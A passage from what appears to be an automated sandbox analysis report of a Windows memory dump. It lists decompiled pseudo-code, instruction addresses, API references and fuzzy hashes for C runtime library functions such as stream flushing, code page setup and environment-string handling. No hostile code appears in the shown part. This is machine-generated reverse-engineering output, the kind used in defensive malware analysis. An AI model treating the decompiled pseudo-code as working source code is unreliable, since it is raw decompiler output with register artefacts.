				_t36 = __rcx;
				_t13 = E6770851C(_t23);
				r12d =  *_t23;
				if(( *(__r8 + 0x18) & 0x00000040) == 0 ||  *((long long*)(__r8 + 0x10)) != 0) {
					_t14 = E6770851C(_t23);
					 *_t23 =  *_t23 & 0x00000000;
					while(_t19 > 0) {
						_t19 = _t19 - 1;
						_t14 = E6770B238(_t14, _t33, _t25);
						_t36 = _t36 + 2;
						if( *_t25 != 0xffffffff) {
							continue;
						}
						_t15 = E6770851C(_t23);
						if( *_t23 != 0x2a) {
							break;
						}
						_t14 = E6770B238(_t15, _t33, _t25);
					}
					_t13 = E6770851C(_t23);
					if( *_t23 == 0) {
						_t13 = E6770851C(_t23);
						 *_t23 = r12d;
					}
					goto L10;
				} else {
					 *__r9 =  *__r9 + __edx;
					L10:
					return _t13;
				}
			}











                                                                                                                                                  0x6770b2c4
                                                                                                                                                  0x6770b2c7
                                                                                                                                                  0x6770b2cb
                                                                                                                                                  0x6770b2cf
                                                                                                                                                  0x6770b2d3
                                                                                                                                                  0x6770b2dd
                                                                                                                                                  0x6770b2e0
                                                                                                                                                  0x6770b2e3
                                                                                                                                                  0x6770b2e5
                                                                                                                                                  0x6770b2e8
                                                                                                                                                  0x6770b2f1
                                                                                                                                                  0x6770b2f4
                                                                                                                                                  0x6770b301
                                                                                                                                                  0x6770b306
                                                                                                                                                  0x6770b33f
                                                                                                                                                  0x6770b315
                                                                                                                                                  0x6770b317
                                                                                                                                                  0x6770b31c
                                                                                                                                                  0x6770b323
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b325
                                                                                                                                                  0x6770b32d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b33a
                                                                                                                                                  0x6770b33a
                                                                                                                                                  0x6770b343
                                                                                                                                                  0x6770b34b
                                                                                                                                                  0x6770b34d
                                                                                                                                                  0x6770b352
                                                                                                                                                  0x6770b352
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770b2fd
                                                                                                                                                  0x6770b2fd
                                                                                                                                                  0x6770b355
                                                                                                                                                  0x6770b36f
                                                                                                                                                  0x6770b36f

                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$write_char
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1772936973-0
                                                                                                                                                  • Opcode ID: 0024d09cd735b9f0cd87f9d049926050109dffccf106c7749a63378892777f99
                                                                                                                                                  • Instruction ID: cd9b9adabc8d9d908e6a91e21087e69828ba3077f2769fcd34c172f228c53a4d
                                                                                                                                                  • Opcode Fuzzy Hash: 0024d09cd735b9f0cd87f9d049926050109dffccf106c7749a63378892777f99
                                                                                                                                                  • Instruction Fuzzy Hash: 9311CEF2A04B80C6DB115F229A4430DB6F4F79DF94F694025DF5407B64CB38EA81CB42
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770A73C, Relevance: 9.1, APIs: 6, Instructions: 118COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                  			E6770A73C(void* __ecx, void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r8, void* __r9, void* __r10, void* __r11, long long __r12, void* _a8, void* _a16, void* _a24, void* _a32) {
				signed int _v24;
				void* _t43;
				signed int _t47;
				signed int _t62;
				signed int _t63;
				void* _t64;
				signed int _t66;
				signed int _t72;
				intOrPtr* _t77;
				long long _t82;
				long long _t87;
				intOrPtr* _t98;
				intOrPtr* _t101;
				void* _t106;
				void* _t107;
				void* _t108;
				void* _t113;

				_t108 = __r11;
				_t107 = __r10;
				_t106 = __r9;
				_t83 = __rcx;
				_t61 = __edx;
				_t55 = __ecx;
				_t77 = _t101;
				 *((long long*)(_t77 + 8)) = __rbx;
				 *((long long*)(_t77 + 0x10)) = __rsi;
				 *((long long*)(_t77 + 0x18)) = __rdi;
				 *((long long*)(_t77 + 0x20)) = __r12;
				_t64 = __ecx;
				r13d = r13d | 0xffffffff;
				E67708E40(__ecx, __eflags, _t77, __rcx, __rsi, __r8);
				_t98 = _t77;
				E6770A378(_t55, __edx, __eflags, _t77, __rbx, __rcx, __rdx, _t98, __rbp, _t113);
				_t80 =  *((intOrPtr*)(_t98 + 0xb8));
				_t43 = E6770A434(_t64, _t77);
				r12d = _t43;
				if(_t43 ==  *((intOrPtr*)( *((intOrPtr*)(_t98 + 0xb8)) + 4))) {
					__eflags = 0;
					r13d = 0;
					L25:
					return r13d;
				}
				E6770C0CC(_t80, _t83, __rdi, _t98);
				_t82 = _t77;
				_t66 = 0;
				_t71 = _t77;
				if(_t77 == 0) {
					goto L25;
				}
				r8d = 0x220;
				E6770ED80(0x220, _t77,  *((intOrPtr*)(_t98 + 0xb8)), __r8);
				 *_t82 = 0;
				_t47 = E6770A4C4(r12d, _t61, __esp, _t71, _t82, _t77, _t82, __r8, _t106, _t107, _t108);
				r13d = _t47;
				_t72 = _t47;
				if(_t72 != 0) {
					__eflags = _t47 - 0xffffffff;
					if(_t47 == 0xffffffff) {
						__eflags = _t82 - 0x677161a0;
						if(_t82 != 0x677161a0) {
							free();
						}
						E6770851C(_t77);
						 *_t77 = 0x16;
					}
					goto L25;
				}
				asm("lock dec dword [ecx]");
				if(_t72 == 0 &&  *((intOrPtr*)(_t98 + 0xb8)) != 0x677161a0) {
					free();
				}
				 *((long long*)(_t98 + 0xb8)) = _t82;
				asm("lock inc dword [ebx]");
				if(( *(_t98 + 0xc8) & 0x00000002) == 0 && ( *0x677166d0 & 0x00000001) == 0) {
					E6770CFB0();
					 *0x67718044 =  *((intOrPtr*)(_t82 + 4));
					 *0x67718048 =  *((intOrPtr*)(_t82 + 8));
					 *0x6771804c =  *((intOrPtr*)(_t82 + 0xc));
					_t62 = _t66;
					while(1) {
						_v24 = _t62;
						if(_t62 >= 5) {
							break;
						}
						 *((short*)(0x67700000 + 0x18038 + _t62 * 2)) =  *(_t82 + 0x10 + _t62 * 2) & 0x0000ffff;
						_t62 = _t62 + 1;
					}
					_t63 = _t66;
					while(1) {
						_v24 = _t63;
						__eflags = _t63 - 0x101;
						if(_t63 >= 0x101) {
							goto L14;
						}
						 *((char*)(_t63 + 0x677163c0)) =  *((intOrPtr*)(_t63 + _t82 + 0x1c));
						_t63 = _t63 + 1;
					}
					while(1) {
						L14:
						_v24 = _t66;
						__eflags = _t66 - 0x100;
						if(__eflags >= 0) {
							break;
						}
						 *((char*)(_t66 + 0x677164d0)) =  *((intOrPtr*)(_t66 + _t82 + 0x11d));
						_t66 = _t66 + 1;
					}
					asm("lock dec dword [eax]");
					if(__eflags == 0) {
						_t87 =  *0x677165d0; // 0x1dea9f11c50
						__eflags = _t87 - 0x677161a0;
						if(_t87 != 0x677161a0) {
							free();
						}
					}
					 *0x677165d0 = _t82;
					asm("lock inc dword [ebx]");
					E6770CEB0();
				}
			}




















                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73c
                                                                                                                                                  0x6770a73f
                                                                                                                                                  0x6770a743
                                                                                                                                                  0x6770a747
                                                                                                                                                  0x6770a74b
                                                                                                                                                  0x6770a755
                                                                                                                                                  0x6770a757
                                                                                                                                                  0x6770a75b
                                                                                                                                                  0x6770a760
                                                                                                                                                  0x6770a763
                                                                                                                                                  0x6770a768
                                                                                                                                                  0x6770a771
                                                                                                                                                  0x6770a776
                                                                                                                                                  0x6770a77c
                                                                                                                                                  0x6770a8f7
                                                                                                                                                  0x6770a8f9
                                                                                                                                                  0x6770a8fc
                                                                                                                                                  0x6770a919
                                                                                                                                                  0x6770a919
                                                                                                                                                  0x6770a787
                                                                                                                                                  0x6770a78c
                                                                                                                                                  0x6770a78f
                                                                                                                                                  0x6770a791
                                                                                                                                                  0x6770a794
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a7a4
                                                                                                                                                  0x6770a7aa
                                                                                                                                                  0x6770a7af
                                                                                                                                                  0x6770a7b7
                                                                                                                                                  0x6770a7bc
                                                                                                                                                  0x6770a7bf
                                                                                                                                                  0x6770a7c1
                                                                                                                                                  0x6770a8d1
                                                                                                                                                  0x6770a8d4
                                                                                                                                                  0x6770a8dd
                                                                                                                                                  0x6770a8e0
                                                                                                                                                  0x6770a8e5
                                                                                                                                                  0x6770a8e5
                                                                                                                                                  0x6770a8ea
                                                                                                                                                  0x6770a8ef
                                                                                                                                                  0x6770a8ef
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a8d4
                                                                                                                                                  0x6770a7d5
                                                                                                                                                  0x6770a7d8
                                                                                                                                                  0x6770a7e6
                                                                                                                                                  0x6770a7e6
                                                                                                                                                  0x6770a7eb
                                                                                                                                                  0x6770a7f2
                                                                                                                                                  0x6770a7fc
                                                                                                                                                  0x6770a816
                                                                                                                                                  0x6770a81f
                                                                                                                                                  0x6770a828
                                                                                                                                                  0x6770a831
                                                                                                                                                  0x6770a837
                                                                                                                                                  0x6770a840
                                                                                                                                                  0x6770a840
                                                                                                                                                  0x6770a847
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a851
                                                                                                                                                  0x6770a85a
                                                                                                                                                  0x6770a85a
                                                                                                                                                  0x6770a85e
                                                                                                                                                  0x6770a860
                                                                                                                                                  0x6770a860
                                                                                                                                                  0x6770a864
                                                                                                                                                  0x6770a86a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a873
                                                                                                                                                  0x6770a87b
                                                                                                                                                  0x6770a87b
                                                                                                                                                  0x6770a87f
                                                                                                                                                  0x6770a87f
                                                                                                                                                  0x6770a87f
                                                                                                                                                  0x6770a883
                                                                                                                                                  0x6770a889
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770a895
                                                                                                                                                  0x6770a89d
                                                                                                                                                  0x6770a89d
                                                                                                                                                  0x6770a8a8
                                                                                                                                                  0x6770a8ab
                                                                                                                                                  0x6770a8ad
                                                                                                                                                  0x6770a8b4
                                                                                                                                                  0x6770a8b7
                                                                                                                                                  0x6770a8b9
                                                                                                                                                  0x6770a8b9
                                                                                                                                                  0x6770a8b7
                                                                                                                                                  0x6770a8be
                                                                                                                                                  0x6770a8c5
                                                                                                                                                  0x6770a8ca
                                                                                                                                                  0x6770a8ca

                                                                                                                                                  APIs
                                                                                                                                                  • _getptd.LIBCMT ref: 6770A75B
                                                                                                                                                    • Part of subcall function 67708E40: _amsg_exit.LIBCMT ref: 67708E56
                                                                                                                                                    • Part of subcall function 6770A378: _getptd.LIBCMT ref: 6770A382
                                                                                                                                                    • Part of subcall function 6770A378: _amsg_exit.LIBCMT ref: 6770A41F
                                                                                                                                                    • Part of subcall function 6770A434: GetOEMCP.KERNEL32(?,?,?,?,?,?,?,6770A776,?,?,?,?,?,6770A933), ref: 6770A45E
                                                                                                                                                    • Part of subcall function 6770C0CC: malloc.LIBCMT ref: 6770C0F7
                                                                                                                                                    • Part of subcall function 6770C0CC: Sleep.KERNEL32(?,?,?,6770CF29,?,?,?,6770CFD3,?,?,00000000,67708D5D,?,?,00000000,67708E14), ref: 6770C10A
                                                                                                                                                  • free.LIBCMT ref: 6770A7E6
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • _lock.LIBCMT ref: 6770A816
                                                                                                                                                  • free.LIBCMT ref: 6770A8B9
                                                                                                                                                  • free.LIBCMT ref: 6770A8E5
                                                                                                                                                  • _errno.LIBCMT ref: 6770A8EA
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$_amsg_exit_errno_getptd$ErrorFreeHeapLastSleep_lockmalloc
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3894533514-0
                                                                                                                                                  • Opcode ID: 002eb5715794d05198fedb7642fa41beef18869142ba42d4c29f2414e91c49ad
                                                                                                                                                  • Instruction ID: 1595a286e9b06ac7609fe227e65b99dbe7c24a90955a4c96ee11537745fc266a
                                                                                                                                                  • Opcode Fuzzy Hash: 002eb5715794d05198fedb7642fa41beef18869142ba42d4c29f2414e91c49ad
                                                                                                                                                  • Instruction Fuzzy Hash: 6341FFB260868086E705CF25E65435AB7F2F798B9CF598126CB5E873A8DF3DC082C701
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770C998, Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770C9B1
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA08
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA43
                                                                                                                                                  • free.LIBCMT ref: 6770CA50
                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA5B
                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,67708121), ref: 6770CA69
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnvironmentStrings$ByteCharFreeMultiWide$free
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 517548149-0
                                                                                                                                                  • Opcode ID: f6730913104d776612c16489d7d1e7d0b974e98674460596419e8bc3ea830309
                                                                                                                                                  • Instruction ID: caf750a044cd6e56dde8fd2586a11dfc622513036149581ccd08fa1d3bc488e0
                                                                                                                                                  • Opcode Fuzzy Hash: f6730913104d776612c16489d7d1e7d0b974e98674460596419e8bc3ea830309
                                                                                                                                                  • Instruction Fuzzy Hash: 1C2160B261878486DB149F22B554269B7E5F788FC5F484924EE8E07B58EF38C160C714
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67708DBC, Relevance: 9.0, APIs: 6, Instructions: 37threadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,67708525,?,?,?,?,6770707E,?,?,?,67703907,?,?,?), ref: 67708DC6
                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,67708525,?,?,?,?,6770707E,?,?,?,67703907,?,?,?), ref: 67708DD4
                                                                                                                                                  • SetLastError.KERNEL32(?,?,?,67708525,?,?,?,?,6770707E,?,?,?,67703907,?,?,?), ref: 67708E2C
                                                                                                                                                    • Part of subcall function 6770C14C: Sleep.KERNEL32(?,?,?,67708DEF,?,?,?,67708525,?,?,?,?,6770707E), ref: 6770C191
                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,67708525,?,?,?,?,6770707E,?,?,?,67703907,?,?,?), ref: 67708E00
                                                                                                                                                  • free.LIBCMT ref: 67708E23
                                                                                                                                                    • Part of subcall function 67708D04: _lock.LIBCMT ref: 67708D58
                                                                                                                                                    • Part of subcall function 67708D04: _lock.LIBCMT ref: 67708D77
                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 67708E14
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastValue_lock$CurrentSleepThreadfree
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3106088686-0
                                                                                                                                                  • Opcode ID: 72d93fd8f8d0b0658835be7605f2f07af52a3925fdf8c76f097136a6d6e15beb
                                                                                                                                                  • Instruction ID: ac3adc7a3ff7b3adeede6f2762baade95badb8cc31b15736f737cfdf8d37ed03
                                                                                                                                                  • Opcode Fuzzy Hash: 72d93fd8f8d0b0658835be7605f2f07af52a3925fdf8c76f097136a6d6e15beb
                                                                                                                                                  • Instruction Fuzzy Hash: 00018671709741C6EB049F65E55832822A2AB9CBA8F8C8638CA29863D4FF3CC455C711
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67709274, Relevance: 7.6, APIs: 5, Instructions: 115COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 85%
                                                                                                                                                  			E67709274(intOrPtr __ecx, signed int __edx, signed int __esi, long long __rbx, signed long long* __rdx, long long __rsi, long long __rbp, signed char _a8, void* _a16, void* _a24, void* _a32) {
				signed int _t46;
				signed int _t49;
				signed int _t50;
				void* _t54;
				signed int _t58;
				signed int _t68;
				signed int _t69;
				void* _t70;
				intOrPtr* _t74;
				signed long long _t75;
				signed long long* _t78;
				void* _t81;
				signed long long _t87;
				signed long long _t91;
				intOrPtr* _t95;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;

				_t69 = __esi;
				_t66 = __edx;
				_t74 = _t95;
				 *((long long*)(_t74 + 0x10)) = __rbx;
				 *((long long*)(_t74 + 0x18)) = __rbp;
				 *((long long*)(_t74 + 0x20)) = __rsi;
				 *((intOrPtr*)(_t74 + 8)) = __ecx;
				_t80 = __rdx;
				_t78 = __rdx;
				_t46 = E6770E5F4(__edx, _t74, __rdx);
				_t60 =  *(__rdx + 0x18);
				_t91 = _t46;
				if((_t60 & 0x00000082) != 0) {
					if((_t60 & 0x00000040) == 0) {
						_t68 = 0;
						if((_t60 & 0x00000001) == 0) {
							L9:
							_t78[1] = _t68;
							_t49 = _t78[3] & 0xffffffef | 0x00000002;
							_t78[3] = _t49;
							if((_t49 & 0x0000010c) == 0) {
								_t54 = E6770E3E0(_t49);
								_t74 = _t74 + 0x30;
								if(_t78 == _t74) {
									L12:
									_t60 = _t69;
									if(E6770E380(_t69, _t66, _t74) == 0) {
										goto L13;
									}
								} else {
									E6770E3E0(_t54);
									if(_t78 != _t74) {
										L13:
										_t80 = _t78;
										E6770E32C(_t74, _t78);
									} else {
										goto L12;
									}
								}
							}
							if((_t78[3] & 0x00000108) == 0) {
								_t70 = 1;
								r8d = 1;
								_t46 = E6770E24C(_t58, _t69, _t66, _t68, _t74, _t78, _t80,  &_a8, _t98, _t99, _t100, _t101);
								_t68 = _t46;
								goto L26;
							} else {
								_t87 = _t78[2];
								_t70 =  *_t78 - _t78[2];
								_t75 = _t87 + 1;
								 *_t78 = _t75;
								_t78[1] = _t78[4] - 1;
								if(_t70 <= 0) {
									if(_t69 == 0xffffffff || _t69 == 0xfffffffe) {
										_t81 = 0x67716b10;
									} else {
										_t87 = 0x67719900;
										_t75 = _t91 >> 5;
										_t81 = _t91 * 0x58 +  *((intOrPtr*)(0x67719900 + _t75 * 8));
									}
									if(( *(_t81 + 8) & 0x00000020) == 0) {
										goto L24;
									} else {
										_t38 = _t87 + 2; // 0x2
										r8d = _t38;
										_t46 = E6770DA08(_t58, _t69, 0, _t68, _t75, _t78, _t81, _t87, _t98);
										if(_t75 == 0xffffffff) {
											goto L2;
										} else {
											goto L24;
										}
									}
								} else {
									r8d = _t70;
									_t68 = E6770E24C(_t58, _t69, _t66, _t68, _t75, _t78, _t80, _t87, _t98, _t99, _t100, _t101);
									L24:
									_t46 = _a8;
									 *(_t78[2]) = _t46;
									L26:
									if(_t68 != _t70) {
										goto L2;
									} else {
										_t50 = _a8 & 0x000000ff;
									}
								}
							}
						} else {
							 *((intOrPtr*)(__rdx + 8)) = 0;
							if((_t60 & 0x00000010) == 0) {
								 *(__rdx + 0x18) = _t60 | 0x00000020;
								goto L3;
							} else {
								_t74 =  *((intOrPtr*)(__rdx + 0x10));
								_t60 = _t60 & 0xfffffffe;
								 *((long long*)(__rdx)) = _t74;
								 *(__rdx + 0x18) = _t60;
								goto L9;
							}
						}
					} else {
						_t46 = E6770851C(_t74);
						 *_t74 = 0x22;
						goto L2;
					}
				} else {
					_t46 = E6770851C(_t74);
					 *_t74 = 9;
					L2:
					_t78[3] = _t78[3] | 0x00000020;
					L3:
					_t50 = _t46 | 0xffffffff;
				}
				return _t50;
			}






















                                                                                                                                                  0x67709274
                                                                                                                                                  0x67709274
                                                                                                                                                  0x67709274
                                                                                                                                                  0x67709277
                                                                                                                                                  0x6770927b
                                                                                                                                                  0x6770927f
                                                                                                                                                  0x67709283
                                                                                                                                                  0x6770928b
                                                                                                                                                  0x6770928e
                                                                                                                                                  0x67709291
                                                                                                                                                  0x67709296
                                                                                                                                                  0x67709299
                                                                                                                                                  0x6770929f
                                                                                                                                                  0x677092bb
                                                                                                                                                  0x677092ca
                                                                                                                                                  0x677092cf
                                                                                                                                                  0x677092ea
                                                                                                                                                  0x677092ed
                                                                                                                                                  0x677092f3
                                                                                                                                                  0x677092f6
                                                                                                                                                  0x677092fe
                                                                                                                                                  0x67709300
                                                                                                                                                  0x67709305
                                                                                                                                                  0x6770930c
                                                                                                                                                  0x6770931c
                                                                                                                                                  0x6770931c
                                                                                                                                                  0x67709325
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770930e
                                                                                                                                                  0x6770930e
                                                                                                                                                  0x6770931a
                                                                                                                                                  0x67709327
                                                                                                                                                  0x67709327
                                                                                                                                                  0x6770932a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770931a
                                                                                                                                                  0x6770930c
                                                                                                                                                  0x67709336
                                                                                                                                                  0x677093c9
                                                                                                                                                  0x677093d5
                                                                                                                                                  0x677093d8
                                                                                                                                                  0x677093dd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770933c
                                                                                                                                                  0x6770933e
                                                                                                                                                  0x67709342
                                                                                                                                                  0x67709345
                                                                                                                                                  0x67709349
                                                                                                                                                  0x67709351
                                                                                                                                                  0x67709356
                                                                                                                                                  0x67709374
                                                                                                                                                  0x67709399
                                                                                                                                                  0x6770937b
                                                                                                                                                  0x67709381
                                                                                                                                                  0x6770938b
                                                                                                                                                  0x67709393
                                                                                                                                                  0x67709393
                                                                                                                                                  0x677093a4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677093a6
                                                                                                                                                  0x677093aa
                                                                                                                                                  0x677093aa
                                                                                                                                                  0x677093ae
                                                                                                                                                  0x677093b7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677093b7
                                                                                                                                                  0x67709358
                                                                                                                                                  0x67709358
                                                                                                                                                  0x67709362
                                                                                                                                                  0x677093bd
                                                                                                                                                  0x677093c1
                                                                                                                                                  0x677093c5
                                                                                                                                                  0x677093df
                                                                                                                                                  0x677093e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677093e7
                                                                                                                                                  0x677093e7
                                                                                                                                                  0x677093e7
                                                                                                                                                  0x677093e1
                                                                                                                                                  0x67709356
                                                                                                                                                  0x677092d1
                                                                                                                                                  0x677092d1
                                                                                                                                                  0x677092d7
                                                                                                                                                  0x67709369
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677092dd
                                                                                                                                                  0x677092dd
                                                                                                                                                  0x677092e1
                                                                                                                                                  0x677092e4
                                                                                                                                                  0x677092e7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677092e7
                                                                                                                                                  0x677092d7
                                                                                                                                                  0x677092bd
                                                                                                                                                  0x677092bd
                                                                                                                                                  0x677092c2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677092c2
                                                                                                                                                  0x677092a1
                                                                                                                                                  0x677092a1
                                                                                                                                                  0x677092a6
                                                                                                                                                  0x677092ac
                                                                                                                                                  0x677092ac
                                                                                                                                                  0x677092b0
                                                                                                                                                  0x677092b0
                                                                                                                                                  0x677092b0
                                                                                                                                                  0x67709400

                                                                                                                                                  APIs
                                                                                                                                                  • _fileno.LIBCMT ref: 67709291
                                                                                                                                                    • Part of subcall function 6770E5F4: _errno.LIBCMT ref: 6770E5FD
                                                                                                                                                    • Part of subcall function 6770E5F4: _invalid_parameter_noinfo.LIBCMT ref: 6770E608
                                                                                                                                                  • _errno.LIBCMT ref: 677092A1
                                                                                                                                                  • _errno.LIBCMT ref: 677092BD
                                                                                                                                                  • _isatty.LIBCMT ref: 6770931E
                                                                                                                                                  • _getbuf.LIBCMT ref: 6770932A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$_fileno_getbuf_invalid_parameter_noinfo_isatty
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2574049805-0
                                                                                                                                                  • Opcode ID: c98ce4b509f18861b87d39563bcd4f311d36ecdf5a5597e0b6d9ebbad097ae9d
                                                                                                                                                  • Instruction ID: 31e03e8fc02df8d8f17a3da5c236d7ce6bde18c6c9ef989fbdf7ff2ae4fc52ef
                                                                                                                                                  • Opcode Fuzzy Hash: c98ce4b509f18861b87d39563bcd4f311d36ecdf5a5597e0b6d9ebbad097ae9d
                                                                                                                                                  • Instruction Fuzzy Hash: FE41BCF2214B4486DB089F39D65032CB7E4E7ADBA8F144629CBA9473D4EB78C851CF41
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 6770EB8C, Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,00000004,00000000,?,00000004,?,6770ED47), ref: 6770EBE6
                                                                                                                                                  • malloc.LIBCMT ref: 6770EC4A
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,?,00000004,00000000,?,00000004,?,6770ED47), ref: 6770EC92
                                                                                                                                                  • GetStringTypeW.KERNEL32(?,?,00000004,00000000,?,00000004,?,6770ED47), ref: 6770ECA9
                                                                                                                                                  • free.LIBCMT ref: 6770ECBD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide$StringTypefreemalloc
